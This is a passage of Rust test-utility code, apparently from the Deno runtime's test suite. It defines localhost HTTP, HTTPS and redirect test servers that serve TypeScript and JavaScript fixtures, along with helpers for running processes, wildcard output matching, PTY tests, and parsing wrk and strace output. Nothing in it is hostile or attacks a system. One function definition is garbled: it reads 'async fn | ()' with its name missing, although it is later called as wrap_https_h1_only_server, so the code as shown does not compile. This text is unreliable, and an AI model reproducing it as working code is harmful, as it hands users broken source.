res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
Ok(res)
}
(_, "/type_headers_deno_types.foo.d.ts") => {
let mut res =
Response::new(Body::from("export function foo(text: string): void;"));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
Ok(res)
}
(_, "/subdir/xTypeScriptTypesRedirect.d.ts") => {
let mut res = Response::new(Body::from(
"import './xTypeScriptTypesRedirected.d.ts';",
));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
Ok(res)
}
(_, "/subdir/xTypeScriptTypesRedirected.d.ts") => {
let mut res = Response::new(Body::from("export const foo: 'foo';"));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
Ok(res)
}
(_, "/referenceTypes.js") => {
let mut res = Response::new(Body::from("/// <reference types=\"./xTypeScriptTypes.d.ts\" />\r\nexport const foo = \"foo\";\r\n"));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/javascript"),
);
Ok(res)
}
(_, "/subdir/file_with_:_in_name.ts") => {
let mut res = Response::new(Body::from(
"console.log('Hello from file_with_:_in_name.ts');",
));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
Ok(res)
}
(_, "/subdir/[email protected]") => {
let mut res = Response::new(Body::from(
r#"import { printHello } from "./mod2.ts";
printHello();
"#,
));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/javascript"),
);
Ok(res)
}
(_, "/.well-known/deno-import-intellisense.json") => {
let file_path =
testdata_path().join("lsp/registries/deno-import-intellisense.json");
if let Ok(body) = tokio::fs::read(file_path).await {
Ok(custom_headers(
"/.well-known/deno-import-intellisense.json",
body,
))
} else {
Ok(Response::new(Body::empty()))
}
}
(_, "/http_version") => {
let version = format!("{:?}", req.version());
Ok(Response::new(version.into()))
}
(_, "/content_length") => {
let content_length = format!("{:?}", req.headers().get("content-length"));
Ok(Response::new(content_length.into()))
}
(_, "/jsx/jsx-runtime") | (_, "/jsx/jsx-dev-runtime") => {
let mut res = Response::new(Body::from(
r#"export function jsx(
_type,
_props,
_key,
_source,
_self,
) {}
export const jsxs = jsx;
export const jsxDEV = jsx;
export const Fragment = Symbol("Fragment");
console.log("imported", import.meta.url);
"#,
));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/javascript"),
);
Ok(res)
}
(_, "/dynamic") => {
let mut res = Response::new(Body::from(
serde_json::to_string_pretty(&std::time::SystemTime::now()).unwrap(),
));
res
.headers_mut()
.insert("cache-control", HeaderValue::from_static("no-cache"));
Ok(res)
}
(_, "/dynamic_cache") => {
let mut res = Response::new(Body::from(
serde_json::to_string_pretty(&std::time::SystemTime::now()).unwrap(),
));
res.headers_mut().insert(
"cache-control",
HeaderValue::from_static("public, max-age=604800, immutable"),
);
Ok(res)
}
(_, "/echo_accept") => {
let accept = req.headers().get("accept").map(|v| v.to_str().unwrap());
let res = Response::new(Body::from(
serde_json::json!({ "accept": accept }).to_string(),
));
Ok(res)
}
_ => {
let mut file_path = testdata_path();
file_path.push(&req.uri().path()[1..]);
if let Ok(file) = tokio::fs::read(file_path).await {
let file_resp = custom_headers(req.uri().path(), file);
return Ok(file_resp);
}
Response::builder()
.status(StatusCode::NOT_FOUND)
.body(Body::empty())
}
};
}
/// Taken from example in https://github.com/ctz/hyper-rustls/blob/a02ef72a227dcdf102f86e905baa7415c992e8b3/examples/server.rs
struct HyperAcceptor<'a> {
acceptor: Pin<
Box<
dyn Stream<Item = io::Result<tokio_rustls::server::TlsStream<TcpStream>>>
+ 'a,
>,
>,
}
impl hyper::server::accept::Accept for HyperAcceptor<'_> {
type Conn = tokio_rustls::server::TlsStream<TcpStream>;
type Error = io::Error;
fn poll_accept(
mut self: Pin<&mut Self>,
cx: &mut Context,
) -> Poll<Option<Result<Self::Conn, Self::Error>>> {
Pin::new(&mut self.acceptor).poll_next(cx)
}
}
unsafe impl std::marker::Send for HyperAcceptor<'_> {}
async fn wrap_redirect_server() {
let redirect_svc =
make_service_fn(|_| async { Ok::<_, Infallible>(service_fn(redirect)) });
let redirect_addr = SocketAddr::from(([127, 0, 0, 1], REDIRECT_PORT));
let redirect_server = Server::bind(&redirect_addr).serve(redirect_svc);
if let Err(e) = redirect_server.await {
eprintln!("Redirect error: {:?}", e);
}
}
async fn wrap_double_redirect_server() {
let double_redirects_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(double_redirects))
});
let double_redirects_addr =
SocketAddr::from(([127, 0, 0, 1], DOUBLE_REDIRECTS_PORT));
let double_redirects_server =
Server::bind(&double_redirects_addr).serve(double_redirects_svc);
if let Err(e) = double_redirects_server.await {
eprintln!("Double redirect error: {:?}", e);
}
}
async fn wrap_inf_redirect_server() {
let inf_redirects_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(inf_redirects))
});
let inf_redirects_addr =
SocketAddr::from(([127, 0, 0, 1], INF_REDIRECTS_PORT));
let inf_redirects_server =
Server::bind(&inf_redirects_addr).serve(inf_redirects_svc);
if let Err(e) = inf_redirects_server.await {
eprintln!("Inf redirect error: {:?}", e);
}
}
async fn wrap_another_redirect_server() {
let another_redirect_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(another_redirect))
});
let another_redirect_addr =
SocketAddr::from(([127, 0, 0, 1], ANOTHER_REDIRECT_PORT));
let another_redirect_server =
Server::bind(&another_redirect_addr).serve(another_redirect_svc);
if let Err(e) = another_redirect_server.await {
eprintln!("Another redirect error: {:?}", e);
}
}
async fn wrap_auth_redirect_server() {
let auth_redirect_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(auth_redirect))
});
let auth_redirect_addr =
SocketAddr::from(([127, 0, 0, 1], AUTH_REDIRECT_PORT));
let auth_redirect_server =
Server::bind(&auth_redirect_addr).serve(auth_redirect_svc);
if let Err(e) = auth_redirect_server.await {
eprintln!("Auth redirect error: {:?}", e);
}
}
async fn wrap_basic_auth_redirect_server() {
let basic_auth_redirect_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(basic_auth_redirect))
});
let basic_auth_redirect_addr =
SocketAddr::from(([127, 0, 0, 1], BASIC_AUTH_REDIRECT_PORT));
let basic_auth_redirect_server =
Server::bind(&basic_auth_redirect_addr).serve(basic_auth_redirect_svc);
if let Err(e) = basic_auth_redirect_server.await {
eprintln!("Basic auth redirect error: {:?}", e);
}
}
async fn wrap_abs_redirect_server() {
let abs_redirect_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(absolute_redirect))
});
let abs_redirect_addr =
SocketAddr::from(([127, 0, 0, 1], REDIRECT_ABSOLUTE_PORT));
let abs_redirect_server =
Server::bind(&abs_redirect_addr).serve(abs_redirect_svc);
if let Err(e) = abs_redirect_server.await {
eprintln!("Absolute redirect error: {:?}", e);
}
}
async fn wrap_main_server() {
let main_server_svc =
make_service_fn(|_| async { Ok::<_, Infallible>(service_fn(main_server)) });
let main_server_addr = SocketAddr::from(([127, 0, 0, 1], PORT));
let main_server = Server::bind(&main_server_addr).serve(main_server_svc);
if let Err(e) = main_server.await {
eprintln!("HTTP server error: {:?}", e);
}
}
async fn wrap_main_https_server() {
let main_server_https_addr = SocketAddr::from(([127, 0, 0, 1], HTTPS_PORT));
let cert_file = "tls/localhost.crt";
let key_file = "tls/localhost.key";
let ca_cert_file = "tls/RootCA.pem";
let tls_config =
get_tls_config(cert_file, key_file, ca_cert_file, Default::default())
.await
.unwrap();
loop {
let tcp = TcpListener::bind(&main_server_https_addr)
.await
.expect("Cannot bind TCP");
println!("ready: https"); // Eye catcher for HttpServerCount
let tls_acceptor = TlsAcceptor::from(tls_config.clone());
// Prepare a long-running future stream to accept and serve cients.
let incoming_tls_stream = async_stream::stream! {
loop {
let (socket, _) = tcp.accept().await?;
let stream = tls_acceptor.accept(socket);
yield stream.await;
}
}
.boxed();
let main_server_https_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(main_server))
});
let main_server_https = Server::builder(HyperAcceptor {
acceptor: incoming_tls_stream,
})
.serve(main_server_https_svc);
//continue to prevent TLS error stopping the server
if main_server_https.await.is_err() {
continue;
}
}
}
async fn | () {
let main_server_https_addr = SocketAddr::from(([127, 0, 0, 1], H1_ONLY_PORT));
let cert_file = "tls/localhost.crt";
let key_file = "tls/localhost.key";
let ca_cert_file = "tls/RootCA.pem";
let tls_config = get_tls_config(
cert_file,
key_file,
ca_cert_file,
SupportedHttpVersions::Http1Only,
)
.await
.unwrap();
loop {
let tcp = TcpListener::bind(&main_server_https_addr)
.await
.expect("Cannot bind TCP");
println!("ready: https"); // Eye catcher for HttpServerCount
let tls_acceptor = TlsAcceptor::from(tls_config.clone());
// Prepare a long-running future stream to accept and serve cients.
let incoming_tls_stream = async_stream::stream! {
loop {
let (socket, _) = tcp.accept().await?;
let stream = tls_acceptor.accept(socket);
yield stream.await;
}
}
.boxed();
let main_server_https_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(main_server))
});
let main_server_https = Server::builder(HyperAcceptor {
acceptor: incoming_tls_stream,
})
.http1_only(true)
.serve(main_server_https_svc);
//continue to prevent TLS error stopping the server
if main_server_https.await.is_err() {
continue;
}
}
}
async fn wrap_https_h2_only_server() {
let main_server_https_addr = SocketAddr::from(([127, 0, 0, 1], H2_ONLY_PORT));
let cert_file = "tls/localhost.crt";
let key_file = "tls/localhost.key";
let ca_cert_file = "tls/RootCA.pem";
let tls_config = get_tls_config(
cert_file,
key_file,
ca_cert_file,
SupportedHttpVersions::Http2Only,
)
.await
.unwrap();
loop {
let tcp = TcpListener::bind(&main_server_https_addr)
.await
.expect("Cannot bind TCP");
println!("ready: https"); // Eye catcher for HttpServerCount
let tls_acceptor = TlsAcceptor::from(tls_config.clone());
// Prepare a long-running future stream to accept and serve cients.
let incoming_tls_stream = async_stream::stream! {
loop {
let (socket, _) = tcp.accept().await?;
let stream = tls_acceptor.accept(socket);
yield stream.await;
}
}
.boxed();
let main_server_https_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(main_server))
});
let main_server_https = Server::builder(HyperAcceptor {
acceptor: incoming_tls_stream,
})
.http2_only(true)
.serve(main_server_https_svc);
//continue to prevent TLS error stopping the server
if main_server_https.await.is_err() {
continue;
}
}
}
async fn wrap_client_auth_https_server() {
let main_server_https_addr =
SocketAddr::from(([127, 0, 0, 1], HTTPS_CLIENT_AUTH_PORT));
let cert_file = "tls/localhost.crt";
let key_file = "tls/localhost.key";
let ca_cert_file = "tls/RootCA.pem";
let tls_config =
get_tls_config(cert_file, key_file, ca_cert_file, Default::default())
.await
.unwrap();
loop {
let tcp = TcpListener::bind(&main_server_https_addr)
.await
.expect("Cannot bind TCP");
println!("ready: https_client_auth on :{:?}", HTTPS_CLIENT_AUTH_PORT); // Eye catcher for HttpServerCount
let tls_acceptor = TlsAcceptor::from(tls_config.clone());
// Prepare a long-running future stream to accept and serve cients.
let incoming_tls_stream = async_stream::stream! {
loop {
let (socket, _) = tcp.accept().await?;
match tls_acceptor.accept(socket).await {
Ok(mut tls_stream) => {
let (_, tls_session) = tls_stream.get_mut();
// We only need to check for the presence of client certificates
// here. Rusttls ensures that they are valid and signed by the CA.
match tls_session.peer_certificates() {
Some(_certs) => { yield Ok(tls_stream); },
None => { eprintln!("https_client_auth: no valid client certificate"); },
};
}
Err(e) => {
eprintln!("https-client-auth accept error: {:?}", e);
yield Err(e);
}
}
}
}
.boxed();
let main_server_https_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(main_server))
});
let main_server_https = Server::builder(HyperAcceptor {
acceptor: incoming_tls_stream,
})
.serve(main_server_https_svc);
//continue to prevent TLS error stopping the server
if main_server_https.await.is_err() {
continue;
}
}
}
// Use the single-threaded scheduler. The hyper server is used as a point of
// comparison for the (single-threaded!) benchmarks in cli/bench. We're not
// comparing apples to apples if we use the default multi-threaded scheduler.
#[tokio::main(flavor = "current_thread")]
pub async fn run_all_servers() {
if let Some(port) = env::args().nth(1) {
return hyper_hello(port.parse::<u16>().unwrap()).await;
}
let redirect_server_fut = wrap_redirect_server();
let double_redirects_server_fut = wrap_double_redirect_server();
let inf_redirects_server_fut = wrap_inf_redirect_server();
let another_redirect_server_fut = wrap_another_redirect_server();
let auth_redirect_server_fut = wrap_auth_redirect_server();
let basic_auth_redirect_server_fut = wrap_basic_auth_redirect_server();
let abs_redirect_server_fut = wrap_abs_redirect_server();
let ws_addr = SocketAddr::from(([127, 0, 0, 1], WS_PORT));
let ws_server_fut = run_ws_server(&ws_addr);
let wss_addr = SocketAddr::from(([127, 0, 0, 1], WSS_PORT));
let wss_server_fut = run_wss_server(&wss_addr);
let ws_close_addr = SocketAddr::from(([127, 0, 0, 1], WS_CLOSE_PORT));
let ws_close_server_fut = run_ws_close_server(&ws_close_addr);
let tls_server_fut = run_tls_server();
let tls_client_auth_server_fut = run_tls_client_auth_server();
let client_auth_server_https_fut = wrap_client_auth_https_server();
let main_server_fut = wrap_main_server();
let main_server_https_fut = wrap_main_https_server();
let h1_only_server_fut = wrap_https_h1_only_server();
let h2_only_server_fut = wrap_https_h2_only_server();
let mut server_fut = async {
futures::join!(
redirect_server_fut,
ws_server_fut,
wss_server_fut,
tls_server_fut,
tls_client_auth_server_fut,
ws_close_server_fut,
another_redirect_server_fut,
auth_redirect_server_fut,
basic_auth_redirect_server_fut,
inf_redirects_server_fut,
double_redirects_server_fut,
abs_redirect_server_fut,
main_server_fut,
main_server_https_fut,
client_auth_server_https_fut,
h1_only_server_fut,
h2_only_server_fut
)
}
.boxed();
let mut did_print_ready = false;
futures::future::poll_fn(move |cx| {
let poll_result = server_fut.poll_unpin(cx);
if !replace(&mut did_print_ready, true) {
println!("ready: server_fut"); // Eye catcher for HttpServerCount
}
poll_result
})
.await;
}
fn custom_headers(p: &str, body: Vec<u8>) -> Response<Body> {
let mut response = Response::new(Body::from(body));
if p.ends_with("/x_deno_warning.js") {
response.headers_mut().insert(
"Content-Type",
HeaderValue::from_static("application/javascript"),
);
response
.headers_mut()
.insert("X-Deno-Warning", HeaderValue::from_static("foobar"));
return response;
}
if p.ends_with("/053_import_compression/brotli") {
response
.headers_mut()
.insert("Content-Encoding", HeaderValue::from_static("br"));
response.headers_mut().insert(
"Content-Type",
HeaderValue::from_static("application/javascript"),
);
response
.headers_mut()
.insert("Content-Length", HeaderValue::from_static("26"));
return response;
}
if p.ends_with("/053_import_compression/gziped") {
response
.headers_mut()
.insert("Content-Encoding", HeaderValue::from_static("gzip"));
response.headers_mut().insert(
"Content-Type",
HeaderValue::from_static("application/javascript"),
);
response
.headers_mut()
.insert("Content-Length", HeaderValue::from_static("39"));
return response;
}
if p.contains("/encoding/") {
let charset = p
.split_terminator('/')
.last()
.unwrap()
.trim_end_matches(".ts");
response.headers_mut().insert(
"Content-Type",
HeaderValue::from_str(
&format!("application/typescript;charset={}", charset)[..],
)
.unwrap(),
);
return response;
}
let content_type = if p.contains(".t1.") {
Some("text/typescript")
} else if p.contains(".t2.") {
Some("video/vnd.dlna.mpeg-tts")
} else if p.contains(".t3.") {
Some("video/mp2t")
} else if p.contains(".t4.") {
Some("application/x-typescript")
} else if p.contains(".j1.") {
Some("text/javascript")
} else if p.contains(".j2.") {
Some("application/ecmascript")
} else if p.contains(".j3.") {
Some("text/ecmascript")
} else if p.contains(".j4.") {
Some("application/x-javascript")
} else if p.contains("form_urlencoded") {
Some("application/x-www-form-urlencoded")
} else if p.contains("unknown_ext") || p.contains("no_ext") {
Some("text/typescript")
} else if p.contains("mismatch_ext") || p.contains("no_js_ext") {
Some("text/javascript")
} else if p.ends_with(".ts") || p.ends_with(".tsx") {
Some("application/typescript")
} else if p.ends_with(".js") || p.ends_with(".jsx") {
Some("application/javascript")
} else if p.ends_with(".json") {
Some("application/json")
} else if p.ends_with(".wasm") {
Some("application/wasm")
} else {
None
};
if let Some(t) = content_type {
response
.headers_mut()
.insert("Content-Type", HeaderValue::from_str(t).unwrap());
return response;
}
response
}
#[derive(Default)]
struct HttpServerCount {
count: usize,
test_server: Option<Child>,
}
impl HttpServerCount {
fn inc(&mut self) {
self.count += 1;
if self.test_server.is_none() {
assert_eq!(self.count, 1);
println!("test_server starting...");
let mut test_server = Command::new(test_server_path())
.current_dir(testdata_path())
.stdout(Stdio::piped())
.spawn()
.expect("failed to execute test_server");
let stdout = test_server.stdout.as_mut().unwrap();
use std::io::{BufRead, BufReader};
let lines = BufReader::new(stdout).lines();
// Wait for all the servers to report being ready.
let mut ready_count = 0;
for maybe_line in lines {
if let Ok(line) = maybe_line {
if line.starts_with("ready:") {
ready_count += 1;
}
if ready_count == 6 {
break;
}
} else {
panic!("{}", maybe_line.unwrap_err());
}
}
self.test_server = Some(test_server);
}
}
fn dec(&mut self) {
assert!(self.count > 0);
self.count -= 1;
if self.count == 0 {
let mut test_server = self.test_server.take().unwrap();
match test_server.try_wait() {
Ok(None) => {
test_server.kill().expect("failed to kill test_server");
let _ = test_server.wait();
}
Ok(Some(status)) => {
panic!("test_server exited unexpectedly {}", status)
}
Err(e) => panic!("test_server error: {}", e),
}
}
}
}
impl Drop for HttpServerCount {
fn drop(&mut self) {
assert_eq!(self.count, 0);
assert!(self.test_server.is_none());
}
}
fn lock_http_server<'a>() -> MutexGuard<'a, HttpServerCount> {
let r = GUARD.lock();
if let Err(poison_err) = r {
// If panics happened, ignore it. This is for tests.
poison_err.into_inner()
} else {
r.unwrap()
}
}
pub struct HttpServerGuard {}
impl Drop for HttpServerGuard {
fn drop(&mut self) {
let mut g = lock_http_server();
g.dec();
}
}
/// Adds a reference to a shared target/debug/test_server subprocess. When the
/// last instance of the HttpServerGuard is dropped, the subprocess will be
/// killed.
pub fn http_server() -> HttpServerGuard {
ensure_test_server_built();
let mut g = lock_http_server();
g.inc();
HttpServerGuard {}
}
/// Helper function to strip ansi codes.
pub fn strip_ansi_codes(s: &str) -> std::borrow::Cow<str> {
STRIP_ANSI_RE.replace_all(s, "")
}
pub fn run(
cmd: &[&str],
input: Option<&[&str]>,
envs: Option<Vec<(String, String)>>,
current_dir: Option<&str>,
expect_success: bool,
) {
let mut process_builder = Command::new(cmd[0]);
process_builder.args(&cmd[1..]).stdin(Stdio::piped());
if let Some(dir) = current_dir {
process_builder.current_dir(dir);
}
if let Some(envs) = envs {
process_builder.envs(envs);
}
let mut prog = process_builder.spawn().expect("failed to spawn script");
if let Some(lines) = input {
let stdin = prog.stdin.as_mut().expect("failed to get stdin");
stdin
.write_all(lines.join("\n").as_bytes())
.expect("failed to write to stdin");
}
let status = prog.wait().expect("failed to wait on child");
if expect_success != status.success() {
panic!("Unexpected exit code: {:?}", status.code());
}
}
pub fn run_collect(
cmd: &[&str],
input: Option<&[&str]>,
envs: Option<Vec<(String, String)>>,
current_dir: Option<&str>,
expect_success: bool,
) -> (String, String) {
let mut process_builder = Command::new(cmd[0]);
process_builder
.args(&cmd[1..])
.stdin(Stdio::piped())
.stdout(Stdio::piped())
.stderr(Stdio::piped());
if let Some(dir) = current_dir {
process_builder.current_dir(dir);
}
if let Some(envs) = envs {
process_builder.envs(envs);
}
let mut prog = process_builder.spawn().expect("failed to spawn script");
if let Some(lines) = input {
let stdin = prog.stdin.as_mut().expect("failed to get stdin");
stdin
.write_all(lines.join("\n").as_bytes())
.expect("failed to write to stdin");
}
let Output {
stdout,
stderr,
status,
} = prog.wait_with_output().expect("failed to wait on child");
let stdout = String::from_utf8(stdout).unwrap();
let stderr = String::from_utf8(stderr).unwrap();
if expect_success != status.success() {
eprintln!("stdout: <<<{}>>>", stdout);
eprintln!("stderr: <<<{}>>>", stderr);
panic!("Unexpected exit code: {:?}", status.code());
}
(stdout, stderr)
}
pub fn run_and_collect_output(
expect_success: bool,
args: &str,
input: Option<Vec<&str>>,
envs: Option<Vec<(String, String)>>,
need_http_server: bool,
) -> (String, String) {
run_and_collect_output_with_args(
expect_success,
args.split_whitespace().collect(),
input,
envs,
need_http_server,
)
}
pub fn run_and_collect_output_with_args(
expect_success: bool,
args: Vec<&str>,
input: Option<Vec<&str>>,
envs: Option<Vec<(String, String)>>,
need_http_server: bool,
) -> (String, String) {
let mut deno_process_builder = deno_cmd();
deno_process_builder
.args(args)
.current_dir(&testdata_path())
.stdin(Stdio::piped())
.stdout(Stdio::piped())
.stderr(Stdio::piped());
if let Some(envs) = envs {
deno_process_builder.envs(envs);
}
let _http_guard = if need_http_server {
Some(http_server())
} else {
None
};
let mut deno = deno_process_builder
.spawn()
.expect("failed to spawn script");
if let Some(lines) = input {
let stdin = deno.stdin.as_mut().expect("failed to get stdin");
stdin
.write_all(lines.join("\n").as_bytes())
.expect("failed to write to stdin");
}
let Output {
stdout,
stderr,
status,
} = deno.wait_with_output().expect("failed to wait on child");
let stdout = String::from_utf8(stdout).unwrap();
let stderr = String::from_utf8(stderr).unwrap();
if expect_success != status.success() {
eprintln!("stdout: <<<{}>>>", stdout);
eprintln!("stderr: <<<{}>>>", stderr);
panic!("Unexpected exit code: {:?}", status.code());
}
(stdout, stderr)
}
pub fn new_deno_dir() -> TempDir {
TempDir::new().expect("tempdir fail")
}
pub fn deno_cmd() -> Command {
let deno_dir = new_deno_dir();
deno_cmd_with_deno_dir(deno_dir.path())
}
pub fn deno_cmd_with_deno_dir(deno_dir: &std::path::Path) -> Command {
let e = deno_exe_path();
assert!(e.exists());
let mut c = Command::new(e);
c.env("DENO_DIR", deno_dir);
c
}
pub fn run_powershell_script_file(
script_file_path: &str,
args: Vec<&str>,
) -> std::result::Result<(), i64> {
let deno_dir = new_deno_dir();
let mut command = Command::new("powershell.exe");
command
.env("DENO_DIR", deno_dir.path())
.current_dir(testdata_path())
.arg("-file")
.arg(script_file_path);
for arg in args {
command.arg(arg);
}
let output = command.output().expect("failed to spawn script");
let stdout = String::from_utf8(output.stdout).unwrap();
let stderr = String::from_utf8(output.stderr).unwrap();
println!("{}", stdout);
if !output.status.success() {
panic!(
"{} executed with failing error code\n{}{}",
script_file_path, stdout, stderr
);
}
Ok(())
}
#[derive(Debug, Default)]
pub struct CheckOutputIntegrationTest {
pub args: &'static str,
pub output: &'static str,
pub input: Option<&'static str>,
pub output_str: Option<&'static str>,
pub exit_code: i32,
pub http_server: bool,
pub envs: Vec<(String, String)>,
}
impl CheckOutputIntegrationTest {
pub fn run(&self) {
let args = self.args.split_whitespace();
let deno_exe = deno_exe_path();
println!("deno_exe path {}", deno_exe.display());
let _http_server_guard = if self.http_server {
Some(http_server())
} else {
None
};
let (mut reader, writer) = pipe().unwrap();
let testdata_dir = testdata_path();
let mut command = deno_cmd();
println!("deno_exe args {}", self.args);
println!("deno_exe testdata path {:?}", &testdata_dir);
command.args(args);
command.envs(self.envs.clone());
command.current_dir(&testdata_dir);
command.stdin(Stdio::piped());
let writer_clone = writer.try_clone().unwrap();
command.stderr(writer_clone);
command.stdout(writer);
let mut process = command.spawn().expect("failed to execute process");
if let Some(input) = self.input {
let mut p_stdin = process.stdin.take().unwrap();
write!(p_stdin, "{}", input).unwrap();
}
// Very important when using pipes: This parent process is still
// holding its copies of the write ends, and we have to close them
// before we read, otherwise the read end will never report EOF. The
// Command object owns the writers now, and dropping it closes them.
drop(command);
let mut actual = String::new();
reader.read_to_string(&mut actual).unwrap();
let status = process.wait().expect("failed to finish process");
if let Some(exit_code) = status.code() {
if self.exit_code != exit_code {
println!("OUTPUT\n{}\nOUTPUT", actual);
panic!(
"bad exit code, expected: {:?}, actual: {:?}",
self.exit_code, exit_code
);
}
} else {
#[cfg(unix)]
{
use std::os::unix::process::ExitStatusExt;
let signal = status.signal().unwrap();
println!("OUTPUT\n{}\nOUTPUT", actual);
panic!(
"process terminated by signal, expected exit code: {:?}, actual signal: {:?}",
self.exit_code, signal
);
}
#[cfg(not(unix))]
{
println!("OUTPUT\n{}\nOUTPUT", actual);
panic!("process terminated without status code on non unix platform, expected exit code: {:?}", self.exit_code);
}
}
actual = strip_ansi_codes(&actual).to_string();
let expected = if let Some(s) = self.output_str {
s.to_owned()
} else {
let output_path = testdata_dir.join(self.output);
println!("output path {}", output_path.display());
std::fs::read_to_string(output_path).expect("cannot read output")
};
if !wildcard_match(&expected, &actual) {
println!("OUTPUT\n{}\nOUTPUT", actual);
println!("EXPECTED\n{}\nEXPECTED", expected);
panic!("pattern match failed");
}
}
}
pub fn wildcard_match(pattern: &str, s: &str) -> bool {
pattern_match(pattern, s, "[WILDCARD]")
}
pub fn pattern_match(pattern: &str, s: &str, wildcard: &str) -> bool {
// Normalize line endings
let mut s = s.replace("\r\n", "\n");
let pattern = pattern.replace("\r\n", "\n");
if pattern == wildcard {
return true;
}
let parts = pattern.split(wildcard).collect::<Vec<&str>>();
if parts.len() == 1 {
return pattern == s;
}
if !s.starts_with(parts[0]) {
return false;
}
// If the first line of the pattern is just a wildcard the newline character
// needs to be pre-pended so it can safely match anything or nothing and
// continue matching.
if pattern.lines().next() == Some(wildcard) {
s.insert(0, '\n');
}
let mut t = s.split_at(parts[0].len());
for (i, part) in parts.iter().enumerate() {
if i == 0 {
continue;
}
dbg!(part, i);
if i == parts.len() - 1 && (part.is_empty() || *part == "\n") {
dbg!("exit 1 true", i);
return true;
}
if let Some(found) = t.1.find(*part) {
dbg!("found ", found);
t = t.1.split_at(found + part.len());
} else {
dbg!("exit false ", i);
return false;
}
}
dbg!("end ", t.1.len());
t.1.is_empty()
}
pub enum PtyData {
Input(&'static str),
Output(&'static str),
}
pub fn test_pty2(args: &str, data: Vec<PtyData>) {
use std::io::BufRead;
with_pty(&args.split_whitespace().collect::<Vec<_>>(), |console| {
let mut buf_reader = std::io::BufReader::new(console);
for d in data.iter() {
match d {
PtyData::Input(s) => {
println!("INPUT {}", s.escape_debug());
buf_reader.get_mut().write_text(s);
// Because of tty echo, we should be able to read the same string back.
assert!(s.ends_with('\n'));
let mut echo = String::new();
buf_reader.read_line(&mut echo).unwrap();
println!("ECHO: {}", echo.escape_debug());
// Windows may also echo the previous line, so only check the end
assert!(normalize_text(&echo).ends_with(&normalize_text(s)));
}
PtyData::Output(s) => {
let mut line = String::new();
if s.ends_with('\n') {
buf_reader.read_line(&mut line).unwrap();
} else {
// assumes the buffer won't have overlapping virtual terminal sequences
while normalize_text(&line).len() < normalize_text(s).len() {
let mut buf = [0; 64 * 1024];
let bytes_read = buf_reader.read(&mut buf).unwrap();
assert!(bytes_read > 0);
let buf_str = std::str::from_utf8(&buf)
.unwrap()
.trim_end_matches(char::from(0));
line += buf_str;
}
}
println!("OUTPUT {}", line.escape_debug());
assert_eq!(normalize_text(&line), normalize_text(s));
}
}
}
});
// This normalization function is not comprehensive
// and may need to updated as new scenarios emerge.
fn normalize_text(text: &str) -> String {
lazy_static! {
static ref MOVE_CURSOR_RIGHT_ONE_RE: Regex =
Regex::new(r"\x1b\[1C").unwrap();
static ref FOUND_SEQUENCES_RE: Regex =
Regex::new(r"(\x1b\]0;[^\x07]*\x07)*(\x08)*(\x1b\[\d+X)*").unwrap();
static ref CARRIAGE_RETURN_RE: Regex =
Regex::new(r"[^\n]*\r([^\n])").unwrap();
}
// any "move cursor right" sequences should just be a space
let text = MOVE_CURSOR_RIGHT_ONE_RE.replace_all(text, " ");
// replace additional virtual terminal sequences that strip ansi codes doesn't catch
let text = FOUND_SEQUENCES_RE.replace_all(&text, "");
// strip any ansi codes, which also strips more terminal sequences
let text = strip_ansi_codes(&text);
// get rid of any text that is overwritten with only a carriage return
let text = CARRIAGE_RETURN_RE.replace_all(&text, "$1");
// finally, trim surrounding whitespace
text.trim().to_string()
}
}
pub fn with_pty(deno_args: &[&str], mut action: impl FnMut(Box<dyn pty::Pty>)) {
if !atty::is(atty::Stream::Stdin) || !atty::is(atty::Stream::Stderr) {
eprintln!("Ignoring non-tty environment.");
return;
}
let deno_dir = new_deno_dir();
let mut env_vars = std::collections::HashMap::new();
env_vars.insert("NO_COLOR".to_string(), "1".to_string());
env_vars.insert(
"DENO_DIR".to_string(),
deno_dir.path().to_string_lossy().to_string(),
);
let pty = pty::create_pty(
&deno_exe_path().to_string_lossy().to_string(),
deno_args,
testdata_path(),
Some(env_vars),
);
action(pty);
}
pub struct WrkOutput {
pub latency: f64,
pub requests: u64,
}
pub fn parse_wrk_output(output: &str) -> WrkOutput {
lazy_static! {
static ref REQUESTS_RX: Regex =
Regex::new(r"Requests/sec:\s+(\d+)").unwrap();
static ref LATENCY_RX: Regex =
Regex::new(r"\s+99%(?:\s+(\d+.\d+)([a-z]+))").unwrap();
}
let mut requests = None;
let mut latency = None;
for line in output.lines() {
if requests == None {
if let Some(cap) = REQUESTS_RX.captures(line) {
requests =
Some(str::parse::<u64>(cap.get(1).unwrap().as_str()).unwrap());
}
}
if latency == None {
if let Some(cap) = LATENCY_RX.captures(line) {
let time = cap.get(1).unwrap();
let unit = cap.get(2).unwrap();
latency = Some(
str::parse::<f64>(time.as_str()).unwrap()
* match unit.as_str() {
"ms" => 1.0,
"us" => 0.001,
"s" => 1000.0,
_ => unreachable!(),
},
);
}
}
}
WrkOutput {
requests: requests.unwrap(),
latency: latency.unwrap(),
}
}
#[derive(Debug, Clone, Serialize)]
pub struct StraceOutput {
pub percent_time: f64,
pub seconds: f64,
pub usecs_per_call: Option<u64>,
pub calls: u64,
pub errors: u64,
}
pub fn parse_strace_output(output: &str) -> HashMap<String, StraceOutput> {
let mut summary = HashMap::new();
// Filter out non-relevant lines. See the error log at
// https://github.com/denoland/deno/pull/3715/checks?check_run_id=397365887
// This is checked in testdata/strace_summary2.out
let mut lines = output
.lines()
.filter(|line| !line.is_empty() && !line.contains("detached ..."));
let count = lines.clone().count();
if count < 4 {
return summary;
}
let total_line = lines.next_back().unwrap();
lines.next_back(); // Drop separator
let data_lines = lines.skip(2);
